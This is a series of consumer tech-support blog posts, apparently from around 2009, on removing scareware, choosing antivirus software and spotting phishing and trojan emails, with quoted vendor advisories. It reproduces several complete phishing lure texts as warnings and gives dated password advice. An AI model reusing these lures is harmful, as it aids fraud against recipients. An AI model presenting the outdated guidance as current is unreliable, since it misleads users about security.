How to: What to do if you get a virus or malware via a pop up message

There have been many posts on TechGeekandMore concerning viruses, spyware, malware, and scareware. If you wonder why, its because as a tech, the number one question and the number one support call that I will take involves pc’s that have already been infected (because the user didn’t know any better) and what to do to clean up the pc.

Sometimes the infection isn’t really bad and a simple scan and delete will clean things up, other times, its a matter of recover/save what you can from the pc and format/reinstall everything (and yes that could mean saying goodbye to important documents or a long downtime). On top of everything else keep in mind that hiring someone like me to clean up your pc could cost $100 / HR or more, and in some cases it may be more cost effective to buy a new pc.

So where do we start, we start at a couple of common things that are DO’s and DONT

1) If your on any website and see a messages like the following

DO NOT CLICK ON YES OR OK, it is a trick used by the writer of the virus or malware (known as social engineering) to get you to install the malware or virus. Since the message will probably pop up as part of the page your on, you may just think that its a natural part of Windows and agree to it, at least that’s what the bad guy hopes you will believe.

Additionally, when online, DO READ WHAT THE POP MESSAGES SAY AND DONT JUST CLICK ON THEM TO GET THEM OUT OF YOUR WAY. ADDITIONALLY DONT BELIEVE EVERYTHING THAT POPS UP (I know this is a hard concept for most). The following are just some of the MILLIONS of possible messages that you could see

Now lets talk about how these happen, they can happen because the website your visiting has been infected by a virus. These days its not just pc’s that get infected it can also be websites both minor and major (Scareware Pop-Ups Target Google, New York Times (http://www NULL.waco NULL.bbb NULL.org/article/scareware-pop-ups-target-google-new-york-times-13118)), so DONT think that because the only sites you visit are major sites (Google, NY Times, Twitter, Facebook, etc) that your entirely safe. You MUST always stay alert.

What if you machine is under attack from a Virus or Malware

Take immediate action as soon as the message or popup comes up. The majority of viruses and malware is written in such a way that not only will your machine get infected, but the infection will go out to the internet (completely automatically) and download additional files and infections to reinforce itself. So the longer you take to address the issue the harder (and probably more expensive) it will be to clean your machine. Image your self getting the flu, you take care of yourself and in a few days your body recovers and everything is normal again. However, if you get the flu and ignore it and just let it continue without doing anything about it, you could get sick enough to end up in a hospital or even dead. (Sorry to make it so over dramatic, but really that’s what it boils down to).

As soon as you receive a one of these type of scareware/malware/virus pop up windows, you need to use the task manager to close whatever program your using to get to the internet (You should NEVER try and close the program with the ok or cancel button on the program as all the buttons no matter what they say will download unwanted files on to your pc). You can access the task manager 1 of 2 ways

Task Manager via Ctrl Alt Del key

Hold down ctrl, alt, and delete at the same time.

If your on WindowsXP you will see this box. Just select task manager.

If your on Windows Vista or 7, then you will see this window. Select Start Task Manager from here.

Task Manager via Right Click

Use an empty space on the task menu (that’s the bar on the bottom where you see your programs) right click, you will see Task Manager as a choice. Select Task Manager from there.

Once you have opened the Task Manager, you will see the following window.

From the applications tab you will see all programs that are currently running. You should highlight any program that is connected to the internet (Internet Explorer, Firefox, Chrome, etc and Anything email) and select End Task. You will be prompted with

and select End Now. Continue doing that until you remove everything that is connected to the internet.

Once you have closed the Window – what next?

This may take a little time, but its best to check you pc and make sure nothing stayed on it that shouldn’t be there. There are 4 things you need to do at this point.

Step#1 -

If you use Internet Explorer

Go to Tools –> Internet Options –> select delete in the browser history section and delete all

If your using Firefox

Go to Tools –> Options –> Privacy and select clear your recent history and remove individual cookies ( you may need to change the setting to remember history to get to the settings)

If you use any other browser look for the area to remove, cache, temp or cookies and remove all.

***Also make sure you empty your recycling bin.***

Step# 2-

If you don’t already have a copy on your pc, download Super Antispyware (LINK: http://superantispyware.com/ (http://superantispyware NULL.com/)) and install Super Antispyware. **There is a Free and Pro edition, all you will need is the free edition.**

- During the install you will see the following screens. Make sure you say YES to “Would you like Super Antispyware to check for the latest updates….” then select the default or recommended setting for the remaining screens. On the screen asking for email address you do NOT have to enter anything, you can just select the next button.

Once installed you will see the following screen, just make sure that the definition date (on the bottom right) is current (shouldn’t be more than a day or two old, if not click on check for updates) then select scan your computer (on top left)

You will then see

At which point, select all your hard drives and select “Perform complete scan” and hit next.

Once the scan completes,

You will see the list of items found. I would recommend that all shown items remain with checks and then select next.

The lastly once the clean up completes. You will be prompted to reboot. I recommend you close anything that is still open and select yes to reboot.

Step# 3

If you don’t already have Malwarebytes, download and install (LINK: http://www.malwarebytes.org/ (http://www NULL.malwarebytes NULL.org/)). **There is both a free and paid version, home users just need to get the free version.

– During the install you will see the following screens, you can select the default choices. Toward the end of the install you will see a choice for “Update Malwarebytes Anti-Malware” make sure you have a check next to that choice.

As soon as it is installed, you will see the following screen. Make sure to select “Perform full scan” and select all your drives and run your scan.

Once completed you will see a list of all items found. Select all and remove. Then reboot pc.

Step# 4

Lastly, whatever Anti-virus you have, make sure you update it to the latest updates or signature file (depending on which one you have) and run a full scan of all your drives. If it finds anything select removal and then reboot.

If you don’t have an Anti-Virus program or yours is expired, TGM recommends Microsoft Security Essentials which is free. (LINK: http://www.microsoft.com/Security_Essentials/ (http://www NULL.microsoft NULL.com/Security_Essentials/) )

I know this was a long post, but the steps listed above would be exactly the steps I would take if you called me (and probably most other techs) to take care of your pc. Hopefully this information helps you stay informed and helps you save a headache and some money in the future.

Software: What every Windows pc user should have installed to secure their pc – Part 1 Anti-Virus

I know we keep taking about malware and viruses and they are big issues (I know this because I spend a large part of every week cleaning clients pc’s of infections). Today I want to cover what you should have installed and what steps you should take on a regular basis to maintain your pc, so that it runs as you would expect it to.

1st Thing – A good Anti-Virus program

You would be surprised how easy this one is, yet how often I find this rule being broken (As I’m being paid $100 bucks an hour to clean up a mess). Your anti-virus program should be current and should be updated regularly. There paid programs from Symantec, McAffe, or CA (as well as many others) and Free versions from Avast or Microsoft (as well as many others). If you get a new pc you probably will get an Anti-virus program loaded, but that program may only be licensed for 90 days or 6 months or 1 yr, which means it will only update for that time frame and unless you pay to continue using it, you will no longer be protected from new viruses (There are literally 100’s of new Viruses every week). You should also check your anti-virus program on a regular basis, by opening it, and looking to see if it says that your “definitions status” is up to date and that it shows you as protected (Example below is from Microsoft Security Essentials).

You also need to make sure that your anti-virus software does not say that your “At Risk” or “Not Protected” You wouldn’t believe how many clients tell me “I have ant-virus installed, I didn’t know I had to update it”. I have even seen clients who are running anti-virus but get infected and when you look the A/V definition files they are from 2005 (that was the worst one so far and I just saw that in Aug. 2009).

Now the question I’m sure at least a few of you are asking is what should you use. Well here is current recommendations.

Paid for Products –

Norton Anti-Virus “Gaming Edition” (http://www NULL.symantec NULL.com/norton/norton-antivirus-gaming-edition). I know what it says “Gaming Edition” but from what I have seen, its the version from Symantec that is least likely to slow your computer down while still protecting you.

NOD32 Anti-Virus 4 (http://www NULL.eset NULL.com/products/nod32 NULL.php). In reviews NOD32 always seems to be the one to catch the most viruses.

Both Symantec (http://www NULL.symantec NULL.com/norton/theme NULL.jsp?themeid=trialware_nav2010&depthpath=0&header=0&inid=us_hho_downloads_navtrial) and ESET (http://www NULL.eset NULL.com/download/free_trial_download_eav NULL.php) have “trial versions” that you can download and install on your machine for free (trials are 30 days) so that you can see how they work and make sure that the software works on your pc without any conflicts.

As you will see I’m listing Anti-Virus versions, if you look at either of the Symantec (http://www NULL.symantec NULL.com/norton/index NULL.jsp) or ESET (http://www NULL.eset NULL.com/) you will also see listings for “Internet security” or “Smart Security” suites. In my opinion, I always recommend against a suite package, because you will pay a lot more to get some features you will probably not use, suites are more likely to slow your machine down since they will try and do more than you need (In my opinion its like getting a dead bolt for your door for the Anti-Virus software vs… having an armed guard standing in front of your door for the suite. Unless you live in a war zone I don’t think you need the armed guard). Additionally, there is always a chance that if malware does get in, and you have an end all – be all suite that your suite could be disabled by the malware killing all your protection at once. So I don’t believe in putting all your eggs in one basket. In Part 2 – I will talk about additional software to protect from other malware that is not covered in the Anti-virus software.

Remember with paid products, you have to pay for the product and will have to pay on a yearly basis to renew the license so that you can continue to get updates for the product. So it isn’t a 1 and done situation.

Free Products –

The fact that there are free Anti-Virus products out there means that you really have no excuse not to be protected. The main difference between the paid for products above and the free products I’m about to list involves support. If you pay for the product you will get various support options from the maker of the software, in case you have a problem or need assistance. With free products that support is a lot more limited and if you need assistance you will most likely need to turn to a knowledgeable family member, friend or a tech like myself for assistance. (Who doesn’t know a teenager they can turn to at a moment like that)

Microsoft Security Essentials (http://www NULL.microsoft NULL.com/security_essentials/). Microsoft Security Essentials provides real-time protection for your home PC that guards against viruses, spyware, and other malicious software.

Avast! (http://www NULL.avast NULL.com/eng/download-avast-home NULL.html)Offers a free version for protection of your pc.

Both the Microsoft and Avast! software help secure your pc against threats online. The Microsoft product only has a free version, while Avast! has both a free and paid for product. (Full disclosure: I currently choose to protect all my pc’s with Microsoft Security Essentials)

Procedures -

If you use any of these 4 products you will have a line of defense against infections that travel in cyberspace, however remember some important steps.

You should only have 1 software product that includes auto-protect installed on your pc (one of the ones I list above or one of your choosing if you pick something else). You should never install more than one that includes auto protect because it will become self-defeating in that when you have more than one software installed with auto-protect, they will each think that the other is a virus and basically work on blocking each other.
You need to make sure that your choice of anti-virus software has auto protect turned on and that it has current definition files for your software choice.
Once a week – you should run a full scan of your computer with the all files selection on your scan. What I normally do is one night a week I leave my computer on running a scan as I go to bed. The next morning I just verify the results and if the results show any infection I can address it at that time. A full scan can take up to a couple of hours depending on how many files and how big your hard drive is.

Lastly and most importantly, follow safe computing practices when you are online.

1. Don’t open email attachments or click on links from emails; even if the email is from someone you know because there is a good chance that attachment and email was not actually sent by the person or the person who sent you the email clicked on a link they shouldn’t have and that email was automatically triggered. (Alert: Hiya:) Email – Just another attempt to get you to click on a link that you REALLY SHOULD NOT! (http://techgeekandmore NULL.com/2009/11/04/alert-hiya-email-just-another-attempt-to-get-you-to-click-on-a-link-that-you-really-should-not/))

2. Don’t download files from places you aren’t absolutely sure are safe. Think of this as the Halloween rule. Your kids go trick or treating and when they get home what do you do, you check the candy so that you make sure its safe before they get to eat any. In cyberspace you need to make sure you know from where you download, don’t just assume that because its in cyberspace its safe.

3. Update all your software regularly. This one takes a little bit of work. However, you need to make sure that your operating system (Windows, Mac, or even Linux) gets updates installed when released. The majority of the time these days, updates involve fixes to the operating system that protect you from something a bad guy is doing. In addition to the operating system, there are other programs on your pc, that need updating regularly to make sure that the bad guys don’t use those to get into your pc. Programs like Adobe Acrobat, Adobe Flash, Adobe Shockwave, Real Player, Apple QuickTime, Microsoft Office (and others) all have updates released on a regular basis to correct issues that a bad guy can use to get in. When its a program that needs an update, image your house as your operating system, you lock your door, and your secure, however the other programs are your windows to your house, and well whoops you forget to lock your window. Guess what the bad guys can still get in. All these updates help make sure that your Doors and Windows (No pun intended to Microsoft products) all remain locked to cyber space.

**Coming up in part 2 – We will cover your 2nd layer of defense and what programs you will need for that.

Alert: Hiya:) Email – Just another attempt to get you to click on a link that you REALLY SHOULD NOT!

I’m not sure how many times I have said “Be careful with messages (Instant Message, Email, Facebook, etc) don’t trust them even if they say they are from someone you know”. The following email is supposed to be from a family member** of mine. I talked to them about the email and they didnt realize that when they received the email from someone they knew and clicked on the link in the email that the email had automatically forwarded itself, even making it look like the family member was the one sending it. (**I did ask for permission from this relative prior to using his email)

Malware writers have been using these social engineering tricks for years in an attempt to get people to drop there guard and click on email links or download attachments. In real life, we hear news stories of bad guys dressing up as city employee’s or law enforcement and then tricking home owners into letting them in, where the bad guys then proceed to steal from the home owner (Here is a release by the Chicago Police Department concerning crooks who use fake uniforms for access http://www.chicagopolice.org/MailingList/PressAttachment/YourCastle.pdf (http://www NULL.chicagopolice NULL.org/MailingList/PressAttachment/YourCastle NULL.pdf)). This email (and those like like it) can be considered the cyber equivalent of the fake cop or fake city worker.

In real life we understand that if you aren’t expecting the gas company or phone company and someone shows up at your door asking to check something in your home, that you question them, check there uniform, ID, see if they have a company vehicle, and even call the business that they are claiming to be from to make sure that the person at your door is actually from where they say they are. In cyber space, it seems because no one really understand how things work (TGM is working hard to change that), that most people just assume if it has someone’s name on it that they know that “it must be from them”. Well Nope and lets go over a few things in this email that clearly show it wasn’t from my relative –

“To:” – Its not addressed to me, since To: is blank even though it is supposed to be an email from someone I know to me.
“Was bored so planned to write you” – I know my relative and there are 2 points here.

1 – He knows English and knows how to write in complete sentences
2 – He would not say something like “Was bored so planned to write you”.

“i’m pretty sure your gonna smile after checking it…….:) ” – I know my family member, if they were going to send me a link or attachment would say something about it and try and explain what it is they are sending me, not just tell me hey check this out.

“It’s easy, secure and free / Try it now” – Again what am I trying. Would you go to a store and my a food product without a label to tell you what it is, simply on the idea that its a food product in a store, so it must be good? I dont think you would (would you?)

“Yours Truly” – This is supposed to be a family member, that a little formal dont you think?

Ok with that being said, again as always, in cyberspace act the same as you would if you were somewhere outside of your home in real life, pay attention to your surrounding, and for pete-sake if you run into someone on a street corner selling you Jack’s Magic Beans, dont buy them.

Alert: Email Claiming to be a Facebook Password Reset Confirmation is a Trojan

Another email is now circulating claiming its from Facebook and claiming that your Facebook password has been changed and that your new information is on an attachment in the email. The email looks something the following

Hey (Insert you name here),

Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.

Thanks,
The Facebook Team

The attachment is actually carrying an updated version of the Bredolab Virus. If you happen to open and download the attachment (which you shouldn’t do), then what will happen is the Bredolab will automatically download and install really bad programs from the internet. Bredolab is basically the trigger that opens the door to your pc, so that other files can download and install themselves, files like rogue anti-spyware programs that continuously keep popping up telling you that you are infected, and other programs that all the bad guys to basically take over your pc. The easiest way to image this is imagining that someone breaks into your home to steal, and not only do they take your property but they also manage to take a key to your front door so that they can keep coming back anytime they like.

Bredolab is considered a Trojan horse and is smart enough to modify legitimate windows processes svchost.exe and explorer.exe plus have the ability to quit itself when it senses that something is scanning it, so that finding it can be made very difficult.

As always remember that even if you do change your password that Facebook (or any other site for that matter) would not send you account information in an email attachment.

Alert: Another attempt to trick you into installing Fake/Rogue Anti-Virus software

The bad guys are at it again, attempting to trick users to install another version of fake/rogue Anti-virus software. This time they are going back to a classic format, email. Emails are now circulating that claim to be from the “Microsoft Windows Computer Safety Team” and look very legitimate, I have seen a couple in my own email. The emails (example below) claim that Conflicker is back and is infecting pc’s and that Microsoft received a notification from your internet provider and is sending you a “fix” to clean your machine. The “fix” is actually Antivirus Pro 2010, one of the many scareware files that Tech Geek and More has talked about in the past (http://techgeekandmore.wordpress.com/category/spyware/ (http://techgeekandmore NULL.com/category/spyware/)).

Please be aware that Microsoft (or any other software company) does not just randomly send out emails asking you to install things or asking for your information. Microsoft uses its many software pages like Bing.com or MSN.com (http://www NULL.msn NULL.com/) or Microsoft.com if it wanted to pass along an official notice, and it uses Windows update service (http://windowsupdate NULL.microsoft NULL.com) (Windows Update.Microsoft.com (http://windowsupdate NULL.microsoft NULL.com) for users of XP or earlier, built into Windows for Vista and Win7 users) for its downloads. It would never just randomly send you a file to install.

*******Example of Letter not from Microsoft************

“Dear Microsoft Customer,

Starting 18/10/2009 the ‘Conficker’ worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected. To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.

Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division

**********************************************

I have highlighted (In Bold) some of the clues in the email that should tell you that this is a fake
Date: 18/10/2009 – This is not U.S. Standard

Microsoft has been advised by your Internet provider that your network is infected – When Microsoft is advised by its partners or even by technology geeks in the general public who find ways that a Microsoft Product can be exploited, they issue press releases thru the media or thru there own web pages (as noted above) and all fixes are issues there Microsoft sites for all users of the affected Microsoft Product.

We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus. – Again Microsoft would never do this as this would be the most counter productive measure, most people have more than 1 email address and many don’t use the email provided by the internet provider (How many of you use @Comcast or @Fios email versus @Hotmail or @Gmail), how do you think Microsoft would actually know what emails to use.

Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division – At least in my email conversations with Microsoft, the name of the person sending me the email appears in the signature. Additionally, if you do a search online for the “Microsoft Windows Computer Safety Division”, you will find that Microsoft does not have a division by that name.

(Soapbox) The bottom line, is that its up to you the user to USE YOUR BRAIN when your online. When you go out, you make sure you lock your door, set your home alarm, set your car alarm, pay attention to your surroundings when you go to a public place, you don’t just leave your wallet or purse on a table or counter in a restaurant or store (or at least I hope you don’t). In cyberspace just because you are not physically there, doesn’t mean that you don’t need to take the same precautions than what you do in real life. (End of Soapbox)

Alert: Rogueware with new Ransom Technology (This takes it up to a whole new level!)

The challenge these days seem to be to try and stay ahead of the criminals who try and steal from you via your computer. I get asked almost daily “Why do I keep having to update my anti-virus, anti-spyware or my anti-malware solutions?” “Can’t I just update it once and get it over with?” Well the simple answer is NO!

Let me ask you this, why do you listen to the traffic every morning on the radio on the way to work? Isn’t finding that route to work, where you can stop and get breakfast or your coffee at Starbucks good enough? Won’t that get you what you need? Well……of course the answer is no. We all listen in case that one day we hear about a traffic accident or police action or broken water main or …… well you get the idea. We want to know this so that we can get a different route and try and avoid getting stuck in a traffic mess. Your route may never be affected, but you listen anyways everyday because that 1 time you don’t listen, you know will be the 1 time that your 30 minute commute will become 4 hours (I did have that once, it was a nightmare). Ok so if you know put that analogy to why you update your software (Operating System, Software, and your Anti-Virus/Anti-malware protection), its basically so that you can hope that you never run into that “nightmare situation”.

Now let me tell you a little about the latest nightmare that the bad guys have started releasing on to the internet that you and I travel. This one is called TotalSecurity2009 (From the same people that brought you AntiVirus2008, AntiVirus2009, and many others http://techgeekandmore.wordpress.com/2009/08/29/alert-another-fake-anti-virus-program/ (http://techgeekandmore NULL.com/2009/08/29/alert-another-fake-anti-virus-program/)). This one does the same things as the others, you go to an infected website and you see a pop up that says “Your computer is infected, click scan now to clean your machine” (or something to that effect depending on which one you get).

Then all of a sudden you start getting these pop-ups that look official and legit and even look like they my be part of your operating system, telling you that “the sky is falling” and that you need to buy (insert Rogue Malware name here), and that you can pay $XX amount of dollars (of course by major credit card) and they will clean your pc for you. That’s like having a burglar walk up to your house and say, sorry I just robbed your house, may I now install your new security system to keep me from robbing you again!

Ok back to TotalSecurity2009, this one has a new wrinkle. An extra level of sophistication, like we haven’t really seen before. In the past when you go infected you suffered thru allot of pop-ups and messages, but for the most part all functions of a pc still worked (OK except maybe web browsing to a legitimate web Anti-Virus website which previous ones would redirect your webpage so that you would only see Antivirus site pages they wanted you to see). In TS2009, its different, TS2009 actually locks all your applications and files, except for Internet Explorer and that is basically so that Internet Explorer can keep giving you messages that you need to pay $79.99 to get the unlock code for TotalSecurity2009 and then be able to use TotalSecurity2009 to clean your system. So in essence, if your a non-technical person and don’t know any better, you will feel like you have no choice but to pay them to release your pc from malware jail.

Here is the biggest problem with paying them, because to me it really isn’t about the $79.99, you will probably never get billed that amount. What you will have done is given a criminal your name and information and your credit card number and in fact what it will cost you will probably be more than $79.99 with your information out in the open for the bad guys to use (and charge your card) at will until you have to close and change your accounts.

The following Video comes from Panda Labs (A maker of legitimate Anti-Virus / Anti-Malware software) that shows how the rogue malware works and what effects it will have on your pc.

[vodpod id=Groupvideo.3686216&w=425&h=350&fv=]

more about “From Panda Labs: Rogueware with new R… (http://vodpod NULL.com/watch/2362304-from-panda-labs-rogueware-with-new-ranson-technology?pod=techgeekandmore)“, posted with vodpod (http://vodpod NULL.com?r=wp)

Additional information from Panda Labs can be found at http://pandalabs.pandasecurity.com/archive/Rogueware-with-new-Ransomware-Technology_2221_.aspx (http://pandalabs NULL.pandasecurity NULL.com/archive/Rogueware-with-new-Ransomware-Technology_2221_ NULL.aspx)

Panda Labs has also cracked the Rogue Anti-Virus so that you can unlock your machine if you get infected with this Rogue malware. Once you unlock your machine, you can download a 1 month free trial of the Panda Global Protection software that you can then use to clean your pc http://www.pandasecurity.com/usa/homeusers/downloads/register?Tipo=1&CodigoProducto=60&Idioma=2&TipoUsuario=12&Country=US&TipoLead=2&Ref=WWUS-GP10-DWN (http://www NULL.pandasecurity NULL.com/usa/homeusers/downloads/register?Tipo=1&CodigoProducto=60&Idioma=2&TipoUsuario=12&Country=US&TipoLead=2&Ref=WWUS-GP10-DWN)

Additionally you can also download Malwarebytes http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?part=dl-10804572&subj=dl&tag=button (http://download NULL.cnet NULL.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572 NULL.html?part=dl-10804572&subj=dl&tag=button) and SuperAntiSpyware http://superantispyware.com/ (http://superantispyware NULL.com/) to do additional scanning of your machine to make sure everything is clean.

Remember, all 3 of these products plus all other PC security software that is from a legitimate software company still needs to be updated by you the user before scanning or attempting to clean any malware from your pc, because you don’t know if your infection was created weeks ago or 1 hour ago and all security software needs to have the latest updates from its maker in order to give you the best chance and cleaning your pc.

UPDATE: Windows Live Credentials exposed – Microsoft Investigating.

Microsoft has a post concerning the Windows Live ID’s that were exposed in the past few days.

From the Windows Live Blog http://windowslivewire.spaces.live.com/blog/cns!2F7EB29B42641D59!41528.entry?wa=wsignin1.0&sa=363915619 (http://windowslivewire NULL.spaces NULL.live NULL.com/blog/cns!2F7EB29B42641D59!41528 NULL.entry?wa=wsignin1 NULL.0&sa=363915619)

*******************************************************

10/5/2009

Update: Phishing scheme affecting some Hotmail customers

As of 3pm PT: We want to provide a quick update, that as a result of our investigation we are taking measures to block access to all of the accounts that were exposed and have resources in place to help those users reclaim their accounts.

If you believe your information was documented on the illegal list, please fill out the following form (https://support NULL.live NULL.com/eform NULL.aspx?productKey=wlidvalidation&ct=eformcs&scrx=1) to reclaim access to your account.

—

Over the weekend Microsoft learned that several thousand Windows Live Hotmail customers’ credentials were exposed on a third-party site due to a likely phishing scheme. Upon learning of the issue, we immediately requested that the credentials be removed and launched an investigation to determine the impact to customers. As part of that investigation, we determined that this was not a breach of internal Microsoft data and initiated our standard process of working to help customers regain control of their accounts.

Phishing is an industry-wide problem and Microsoft is committed to helping consumers have a safe, secure and positive online experience. Our guidance to customers is to exercise extreme caution when opening unsolicited attachments and links from both known and unknown sources, and that they install and regularly update their anti-virus software.” If you believe you’ve been a victim of a phishing scheme, it’s very important that you update your account information and change your password as soon as possible. More information on what to do is available on this page (http://windowslivehelp NULL.com/solutions/accounts/archive/2008/10/25/what-to-do-if-you-think-your-accounts-been-stolen NULL.aspx) at our support community.

Microsoft recommends customers use the following protective security measures:

Renew their passwords for Windows Live IDs every 90 days
For administrators, make sure you approve and authenticate only users that you know and can verify credentials
As phishing sites can also pose additional threats, please install and keep anti-virus software up to date

Answers to a few general questions about phishing scams

Q: What should you do if you fall victim to a phishing scam? How should you respond? What steps should you take?

A: If you think that you may have responded to a phishing scam with personal or financial information or entered this information into a fake website, you should take four key steps: (1) report the incident to the proper authorities, (2) change the passwords on all your online accounts, (3) review your credit reports and your bank and credit card statements, and (4) make sure you are using the latest technologies to help protect yourself from future scams.

For the first step:
- If you have given out your credit card information, contact your credit company right away. The sooner a company knows your account may have been compromised, the easier it will be for them to help protect you.
- Next, contact the company that you believe was forged. Remember to contact the organization directly, not through the e-mail message you received. Or call the organization’s toll-free number and speak to a customer service representative. For Microsoft, call the PC Safety hotline at:
  1-866-PCSAFETY.
- Then, report the incident to the proper authorities. Send an e-mail to spam@uce.gov (spam null@null uce NULL.gov) to report it to the Federal Trade Commission and to reportphishing@antiphishing.org (reportphishing null@null antiphishing NULL.org) to report it to the Anti-Phishing Working Group.
The second step is to change the passwords on all your online accounts. The reason for this is that a lot of people use the same password for multiple accounts. Start with passwords that are related to financial institutions or personal information. If you think someone has accessed your e-mail account, change your password immediately. If you’re using Hotmail, go to: http://account.live.com (http://account NULL.live NULL.com).
The third step is to review your bank and credit card statements and your credit report monthly for unexplained charges, inquiries or activity that you didn’t initiate.
Finally, make sure you use the latest products, such as anti-spam and anti-phishing capabilities in e-mail services, phishing filters in Web browsers and other services to help warn and protect you from online scams.

Q: How can I recognize an e-mail scam?

A: There are several signs you should look for to identify a phishing e-mail: (1) Does it ask you to send your personal information? (2) Is it poorly worded or does it have typos? (3) Does it contain convincing details about your personal information? (4) Does it use phrases like “verify your account” or “you’ve won the lottery?”

Any e-mail asking for your name, birth date, social security number, e-mail username, e-mail password, or any other type of personal information, no matter who the e-mail appears to be from, is almost certainly a scam. Microsoft and most other businesses do not send unsolicited e-mail requesting personal or financial information.
E-mails that are poorly worded, have typos, or have phrases such as "this is not a joke" or "forward this message to your friends" are generally scam e-mails.
Phishing mail often includes official-looking logos and other identifying information taken directly from legitimate Web sites, and it may include convincing details about your personal information that scammers found on your social networking pages.
A few phrases to look for if you think an e-mail message is a phishing scam are:
- "Verify your account."
- "If you don’t respond within 48 hours, your account will be closed."
- "You have won the lottery.”

Q: What should people do if they think they have received a phishing e-mail?

A: If you think you may have received a phishing e-mail, you should take three steps: (1) take some time to check up on it and do not click on a link or give out your personal information, (2) make sure you have created a strong password for your account and (3) report the phishing scam.

The most important thing to remember is do not click on the link or give out your personal information. It is possible for your computer to become infected with malicious software simply by visiting a phishing site – without you even realizing it. If you receive a questionable e-mail, take some time and check up on the information. Often sites like snopes.com list common e-mail scams. Go to that website of the company you r
eceived the e-mail from and contact their customer service reps via phone or online to verify the validity of the e-mail.
Another thing you should do is create a strong password for your e-mail account by using more than 7 characters and having a combination of upper and lower case characters, numbers, and special characters, like the @ or # symbols. It’s also a good idea to change your password on a regular basis. The next time you change your Hotmail password, you can check “make my password expire every 72 days” to remind you to change it.
Finally, help us identify new scams. If you use Hotmail and received a phishing e-mail, you can select the dropdown next to "Junk,” and select "Report phishing scam.” Whatever you do, do not reply back to the sender. You should also report phishing scams to the Anti-Phishing Working Group by e-mailing them at reportphishing@antiphishing.org (reportphishing null@null antiphishing NULL.org).

Q: How common is this scam?

A: The most recent version of Microsoft’s Security Intelligence Report (Volume 6) shows that more than 97 percent of e-mail messages sent over the Internet are unwanted: They have malicious attachments, are phishing attacks, or are spam.

Q: Is Microsoft taking any proactive steps to prevent this from happening?

A: To help protect people from phishing attacks, Microsoft is providing education and guidance to customers, collaborating with other technology leaders, businesses and governments and supporting law enforcement actions against phishers.

We provide guidance and information to customers about how to stay safe online at www.microsoft.com/protect (http://www NULL.microsoft NULL.com/protect) and work with others in the industry and governments to educate people on online threats and safety tips.
From a technology perspective, because so much phishing comes from spammers, our Hotmail spam filter, called SmartScreen, blocks over 4.5 billion unwanted e-mails per day by distinguishing between legitimate e-mail and spam.
The Microsoft Phishing Filter, which is free as part of Internet Explorer 7, Internet Explorer 8, Windows Vista and as an add-on for the Windows Live Search Toolbar, also helps protect people from phishing attacks by identifying suspicious or confirmed phishing sites and warning customers before they reach them.
Law enforcement also plays a big role here. Microsoft has supported 191 enforcement actions against phishers worldwide. These include civil lawsuits filed by Microsoft, as well as civil and criminal actions by international government and law enforcement agencies for which Microsoft made referrals and subsequently provided support.
Microsoft is a founding member of the Anti-Phishing Working Group, a cross-industry association focused on preventing phishing. Microsoft also actively participates in DigitalPhishNet, an alliance between law enforcement and industry leaders in a variety of sectors, including technology, banking, financial services, and online auctioneering. The group is focused on assisting law enforcement in apprehending and prosecuting those responsible for committing crimes against consumers through phishing.

Alert: “See Who Blocked You on MSN” Phishing Attacks

This specific story came out a couple of weeks ago on the TrendMicro blog. This involves an email that says “(Name of someone you know) has invited you to check who has deleted you or blocked from their contact list on MSN Messenger.

In the past couple of days I’ve actually had 2 customers who have received this email and fortunately for them, they asked me about it before clicking on the email. With that said, here is the post from the TrendMicro website concerning this current Phishing Attack.

******************************************************

From http://blog.trendmicro.com/see-who-blocked-you-on-msn-phishing-attacks/ (http://blog NULL.trendmicro NULL.com/see-who-blocked-you-on-msn-phishing-attacks/)
11:22 am (UTC-7) | by Merianne Polintan (Anti-spam Research Engineer)

We have received samples of a new phishing mail targeting users of MSN Messenger inviting them to see who deleted or blocked them from their contact list. Users would be interested to know who among their friends have deleted them from their lists.

Figure 1. Phishing email

Clicking on the link displays the following fake login page asking the user to input his or her password:

Figure 2. Phishing website

It is obvious that the intention of the cybercriminals is to harvest the user’s MSN Messenger login credentials. Afterwards, they can then continuously sends spam messages to the account or, worse, they can use the account for their malicious intent.

Getting in touch with friends is now much easier than before. Because of the growth of social networking sites, we can stay connected with our old friends, or even find new ones. This may include reading the profile pages of other members, sending and receiving invitations to fun games, videos and other applications. However, users must be on guard when interacting within online social networks. Spammers are now abusing these in their phishing attacks.

Always be mindful in accepting “invitations”, especially when it concerns your personal information. This particular spam message, and the associated website, are already blocked by Trend Micro products via the Smart Protection Network.

*********************************************************

Now lets go over what the Trendmicro blog said – By Phishing – The bad guys try and get your information so that they can then get access to your account. Once on your account they can use your “legit” account to help spread the malware in addition to possibly get account information to banking or other financial information, considering these days its very common for people to keep emails or other notes that may have account information.

In a related note, another news story posted today (10/5) by Neowin.net concerning the fact that over 10,000 Windows Live User Names/Passwords were posted online in the past few days most likely means that the bad guys got that information via a phishing scheme like the one explained by Trendmicro. The compromised accounts affect Hotmail, Windows Live Messenger, Zune, Xbox accounts to name a few as most people share the same sign in throughout the various Microsoft online sites and offerings. the complete store on the password posting can be seen at http://www.neowin.net/news/main/09/10/05/thousands-of-hotmail-passwords-leaked-online (http://www NULL.neowin NULL.net/news/main/09/10/05/thousands-of-hotmail-passwords-leaked-online)

Some of the most important things to keep in mind when using email or instant messaging or twitter or any social networking site or basically anything on the internet.

1) Regularly change your passwords. I know this one drives most people nuts, but changing your passwords can prevent someone else who knows your password access to your account. (If you currently use any Microsoft online passwords like Hotmail, Messenger, Xbox, Zune, etc it is highly recommended that you change your password and your secret access code immediately due to that breach)

2) Do not use the word “password” or admin or bank or “your name” or anything that anyone over the age of 5 can guess. Passwords should be what is called alpha-numeric including caps and symbols which means that it should look something like this Pa55w0rd@ (which is the word password with a capital P followed by the number 5 twice instead of the letter s and a zero instead of the letter o and the @ symbol at the end).

